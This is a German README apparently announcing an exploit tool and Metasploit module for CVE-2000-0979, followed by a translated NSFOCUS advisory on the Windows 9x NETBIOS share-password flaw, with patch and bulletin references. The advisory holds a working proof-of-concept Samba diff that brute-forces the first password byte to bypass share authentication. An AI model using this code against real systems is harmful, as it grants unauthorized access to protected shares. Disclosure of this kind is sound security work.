
CVE-2000-0979
CVE-2000-0979.rb ist das eigenständige Tool, um CVE-2000-0979 gegen den Windows 95 SMB-Dienst auszunutzen.
msf_2000_0979.rb ist das Metasploit-Modul. Sie können dies in metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb kopieren.

Weitere Dokumentation folgt in Kürze!
NSFOCUS Security Advisory (SA2000-05)
Thema: Microsoft Windows 9x NETBIOS-Passwortüberprüfungs-Schwachstelle
Veröffentlichungsdatum: 24. August 2000 Aktualisierungsdatum: 11. Oktober 2000
In dem von Microsoft Windows 9x NETBIOS-Protokollimplementierung verwendeten Passwortüberprüfungsmechanismus existiert eine Schwachstelle. Diese Schwachstelle ermöglicht es jedem Benutzer, auf den passwortgeschützten Dateifreigabedienst von Windows 9x zuzugreifen. Der Angreifer muss das Freigabepasswort nicht kennen.
Sie können ein Passwort festlegen, um die gemeinsam genutzten Ressourcen eines Microsoft Windows 9x-Systems zu schützen. In dem von Microsoft Windows 9x NETBIOS-Protokollimplementierung verwendeten Passwortüberprüfungsmechanismus existiert jedoch eine Schwachstelle. Bei der Überprüfung des Passworts hängt die Länge des Passworts von der Länge der vom Client an den Server gesendeten Daten ab. Das heißt: Wenn ein Client die Länge des Passworts auf ein Byte setzt und das Paket mit dem Klartext-Passwort an den Server sendet, vergleicht der Server es nur mit dem ersten Byte des Freigabepassworts (Klartext). Bei Übereinstimmung ist der Überprüfungsvorgang abgeschlossen. Ein Angreifer muss lediglich das erste Byte des Passworts beim Opfer erraten und ausprobieren. Das Windows 9x-Fernverwaltungssystem ist ebenfalls betroffen, da es die gleiche Methode zur Authentifizierung von Freigabepasswörtern verwendet.
Hier ist ein einfaches Beispiel, um diesen Fehler zu demonstrieren. Holen Sie sich das Samba-Quellpaket und ändern Sie source/client/client.c wie folgt:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Schließen Sie den Microsoft Datei- und Druckfreigabedienst.
Microsoft wurde informiert und hat ein Sicherheitsbulletin zu diesem Fehler veröffentlicht.
Das Bulletin ist abrufbar unter:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
Patches sind verfügbar unter:
. Microsoft Windows 95
Patch in Kürze verfügbar
. Microsoft Windows 98 und 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
DIE BEREITGESTELLTEN INFORMATIONEN WERDEN VON NSFOCUS OHNE JEGLICHE GEWÄHRLEISTUNG ZUR VERFÜGUNG GESTELLT. NSFOCUS LEHNT ALLE GEWÄHRLEISTUNGEN, SOWOHL AUSDRÜCKLICH ALS AUCH STILLSCHWEIGEND, AB, MIT AUSNAHME DER GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT. IN KEINEM FALL HAFTET NSFOCUS FÜR IRGENDWELCHE SCHÄDEN, EINSCHLIESSLICH DIREKTER, INDIREKTER, ZUFÄLLIGER, FOLGESCHÄDEN, VERLUST VON GESCHÄFTSGEWINNEN ODER BESONDERER SCHÄDEN, SELBST WENN NSFOCUS AUF DIE MÖGLICHKEIT SOLCHER SCHÄDEN HINGEWIESEN WURDE. DIE VERBREITUNG ODER VERVIELFÄLTIGUNG DER INFORMATIONEN IST UNTER DER VORAUSSETZUNG GESTATTET, DASS DIE HINWEISE IN KEINER WEISE VERÄNDERT WERDEN.
© Copyright 1999-2000 NSFOCUS. Alle Rechte vorbehalten. Nutzungsbedingungen.
NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)